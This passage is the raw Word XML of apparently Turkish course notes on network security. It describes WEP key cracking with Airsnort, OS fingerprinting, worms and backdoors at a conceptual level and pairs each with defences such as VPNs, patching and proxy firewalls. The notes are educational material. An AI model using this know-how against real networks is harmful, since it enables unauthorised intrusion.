          <w:numId w:val="28"/>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Hedef ağları keşfettikten sonra, birçok saldırgan Dinamik Ana Bilgisayar Yapılandırma Protokolünü (DHCP) kullanarak ağda bir IP adresi almaya çalışacaktır . Çoğu kablosuz LAN, serbestçe soran herkese adresler verir . DHCP üzerinden bir adres aldıktan sonra, saldırgan LAN'a erişmeye çalışacaktır. Bazı LAN'lar kriptografik kimlik doğrulama ve gizlilik sağlamak için Kablolu Eşdeğer Gizlilik (WEP) protokolünü kullanır. WEP, kablosuz bir LAN'ın güvenliğini büyük ölçüde artırırken, bir saldırganın bir erişim noktasının anahtarlarını belirlemesine izin verebilecek bazı güvenlik açıkları vardır. Saldırgan, Airsnort gibi bir araç kullanarak önemli miktarda trafik toplayarak (genellikle 500 MB'nin üzerinde) WEP anahtarlarını kırabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="417"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Peki ne yapmalıyız ???</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="215" w:line="221" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">SSID'yi belirsiz bir değere ayarlayabiriz. Fakat yukarıda belirtildiği gibi, SSID'ler bir güvenlik özelliği değildir ve bu şekilde ele alınmamalıdır . SSID'yi belirsiz bir değere ayarlamak sisteme güvenlik açısından çok az şey katar.Bununla birlikte, bazı erişim noktaları, SSID yayın taleplerine verilen yanıtları yasaklamak için yapılandırılabilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>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 xml:space="preserve">MAC adresi filtrelemesi kullanılabilir. Her kablosuz ağın, medya erişim denetimi (MAC) </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>adresi adı verilen  donanım düzeyinde benzersiz bir adresi vardır. Bir kablosuz erişim noktası, yalnızca belirli MAC adreslerinden gelen trafiğe izin verecek şekilde yapılandırılabilir.</w:t>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472" w:right="1919" w:bottom="1464" w:left="1125" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="3199"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="4400550"/>
            <wp:effectExtent l="9525"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4000500" cy="4400550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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440" w:right="1073" w:bottom="1440" w:left="871" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>Yukarıda da belirtildiği gibi WEP’i periyodik  anahtarlama ile kullanmak LAN güvenliğini büyük ölçüde artırır.</w:t>
      </w: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t>Cisco nun aironet güvenlik çözümü gibi dinamik WEP anahtarları vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="214" w:line="221" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tüm bunların yanı sıra bu saldırılardan korunmanın en iyi yolu SANAL BİR ÖZEL AĞ (VPN) kullanmaktır.VPN kullanımı uçtan uca güvenlik sağlar.Çünkü VPN gönderilen tüm verileri gönderilmeden önce şifreler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc10000238"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AKTİF VE PASİF İŞLETİM SİSTEMİ SALDIRILARI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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Bir ağa erişim sağlandıktan sonra, saldırganlar genellikle hedef ortam hakkında bilgi edinmeye çalışır, böylece saldırılarını güçlendirebilirler. Özellikle, saldırganlar genellikle işletim sistemi (OS) hedef türlerini keşfetmeye odaklanır.İşletim sistemi türü ile donanmış saldırganlar, saldırılarının etkinliğini en üst düzeye çıkarmak için bu işletim sistemlerinin belirli açıklarını arayabilirler . Bir ağdaki işletim sistemi tiplerini belirlemek için, saldırganlar iki teknik kullanır: (1)aktif işletim sistemi parmak izi olarak bilinen, zaman testli yaklaşım (2) yeni bulunan, pasif işletim sistemi parmak izi içeren bir teknikdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="229" w:line="216" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bu saldırılar sistemin başlangıç zamanını (TTL),pencere boyutu,maximum segment boyutu,pencere ölçeklendirme dahil olmak üzere TCP ve IP trafiğinde gönderilen birkaç alanı analiz ederrek OS türünü belirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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Daha sonra saldırgana istediği her bilgiye ulaşma fırsatı doğar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="723" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bu tür saldırılardan korunmak için ne yapmalıyız ????</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bir saldırganın işletim sistemi türlerinizi kullanarak sahip olabileceği etkiyi en aza indirmek için , sistem yamalarının bildirilmesi, test edilmesi ve uygulanması için tanımlanmış bir programınız olmalıdır . Sistemlerinizi en son güvenlik düzeltmeleriyle birlikte tutarsanız , saldırganların hangi işletim sistemini çalıştırdığınızı bilmesi çok fazla bir şey değiştirmeyecektir.Makinelerinizden ödün verme olasılığınız çok düşük olacaktır . Ayrıca, yamalar tanımlandıktan sonra, kalite güvence ortamında iyice test edilmelidir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>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Edilgen OS parmak izi aldatmak için, bir proxy tarzı güvenlik duvarı kullanımını düşünebilirsiniz. Proxy güvenlik duvarları paketleri yönlendirmez, bu nedenle paket başlıklarında iletilen işletim sistemi türü ile ilgili tüm bilgiler proxy tarafından imha edilir . Proxy güvenlik duvarları bir istemciden bağlantı kabul eder ve ardından bu istemci adına sunucuya yeni bir bağlantı başlatır . Güvenlik duvarının dışındaki tüm paketler güvenlik duvarının kendisinin işletim sistemi parmak izlerine sahip olacaktır. Bu nedenle, güvenlik duvarı içindeki tüm sistemlerin işletim sistemi türü maskelenecektir. Bu tekniğin çoğu paket filtre güvenlik duvarı için çalışmadığını unutmayın; çünkü paket, paketleri yönlendirir ve bu nedenle,paket başlıklarında depolanan parmak izi bilgisini iletir .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc10000239"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SOLUCAN SALDIRILAR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="355"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir bilgisayar solucanı, bir ağ üzerinden yayılan ve savunmasız sistemden savunmasız sisteme yayılan, kendi kendini kopyalayan bir bilgisayar saldırı aracıdır . Son zamanlarda,Ramen, L10n, Cheese, Code Red ve Nimda gibi isimlerle dolu bir bilgisayar solucanları hayvanat bahçesi oluşmuştur . Yeni solucanlar baş döndürücü bir hızda salınmaktadır .İki </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ila altı ayda bir yeni nesil solucan internete çarpmaktadır. Solucan geliştiricileri , her solucan neslinin başarısından dersler çıkarmakta ve sonraki saldırılarda kendilerine hazırlamaktadır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bu evrimsel döngü ile, süper solucanlar çağına hızla yaklaşıyoruz !!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc10000240"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SOLUCAN SALDIRI TÜRLERİ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="158" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-1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Hızla yayılan solucanlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="158" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-1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Çok Platformlu Solucanlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-1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Gizlenmiş Solucanlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="868" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-15"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Zero-Day Exploit Worms (sömürücü solucanlar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="-15"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Solucan saldırılarının genel amacı kaynat tüketmektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc10000241"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Solucan Savunması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="355"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hem reaktif hem de proaktif savunmalar kurmanız gerekiyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="158" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="-15"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>1)Olaya müdahale hazırlığı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:hanging="370"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sistemi güçlendirme ve gereksiz bağıntıları engelleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="183" w:line="216" w:lineRule="auto"/>
        <w:ind w:hanging="370"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Çalıştırılamayan Sistem Yığını Bazı Solucanları Durdurmaya Yardımcı Olabilir </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc10000242"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ARKA KAPI SALDIRILARI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="355"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Saldırganlar bir sistemi tehlikeye attıktan sonra, genellikle makineye tekrar erişmelerini sağlamak için bir arka kapı aracı kullanırlar. Arka kapı, saldırganların makineye kendi şartlarına erişmelerini sağlayan bir programdır. Normal kullanıcıların bir şifre girmeleri veya bir şifreleme belirteci kullanmaları gerekir; saldırganlar bu normal güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kontrollerini atlamak için arka kapı kullanırlar . Geleneksel olarak, arka kapılar, arka planda sessizce saldırgandan bağlantı bekleyen bir TCP veya UDP bağlantı noktasıdır. Saldırgan, komut vermek için uygun TCP veya UDP bağlantı noktasındaki bu arka kapı sunucularına bağlanmak için bir istemci aracı kullanır.</w:t>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490" w:right="1384" w:bottom="1464" w:left="376" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2225"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6953250" cy="28765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6953250" cy="2876550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="762"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005421E3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc10000243"/>
      <w:r w:rsidRPr="005421E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ARKA KAPI SALDIRILARI SAVUNMA TEKNİKLERİ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
